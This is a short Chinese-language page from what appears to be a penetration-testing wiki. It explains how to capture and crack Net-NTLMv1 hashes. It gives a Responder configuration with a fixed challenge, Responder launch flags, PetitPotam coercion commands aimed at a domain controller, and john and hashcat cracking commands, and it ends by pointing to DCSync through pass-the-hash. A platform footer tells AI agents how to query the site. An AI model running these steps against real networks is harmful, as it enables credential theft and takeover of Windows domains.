> For the complete documentation index, see [llms.txt](https://www.heresecurity.wiki/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.heresecurity.wiki/heng-xiang-yi-dong/ntlm-zhong-ji-he-zhong-jian-ren-gong-ji/bu-huo-he-po-jie-net-ntlmv1-he-ntlmv1-ha-xi.md). # 捕获和破解Net NTLMv1和NTLMv1哈希 ``` Net-NTLM (NTLMv1) 散列用于网络身份验证(它们源自质询/响应算法并基于用户的 NT 散列。 要求: LmCompatibilityLevel = 0x1:发送 LM & NTLM ( reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v lmcompatibilitylevel) 使用 Responder 捕获:编辑/etc/responder/Responder.conf文件 ``` ```bash HTTPS = On DNS = On LDAP = On ... ; Custom challenge. ; Use "Random" for generating a random challenge for each requests (Default) Challenge = 1122334455667788 ``` ``` Fire Responder: responder -I eth0 --lm,如果--disable-ess设置,扩展会话安全将被禁用 NTLMv1 身份验证 >PetitPotam.exe Responder-IP DC-IP #2021 年 8 月左右修补 >PetitPotam.py -u Username -p Password -d Domain -dc-ip DC-IP Responder-IP DC-IP #未为经过身份验证的用户打补丁 如果获取到些NTLMv1 hashes 去这里https://crack.sh/ 或者用 Hashcat / John The Ripper 破解 >john --format=netntlm hash.txt >hashcat -m 5500 -a 3 hash.txt 现在可以通过 DC 机器帐户使用 Pass-The-Hash 进行 DCSync ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.heresecurity.wiki/heng-xiang-yi-dong/ntlm-zhong-ji-he-zhong-jian-ren-gong-ji/bu-huo-he-po-jie-net-ntlmv1-he-ntlmv1-ha-xi.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.